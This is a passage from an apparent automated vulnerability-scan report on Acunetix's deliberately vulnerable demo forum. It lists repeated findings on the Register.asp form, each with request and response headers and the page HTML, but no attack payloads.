href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
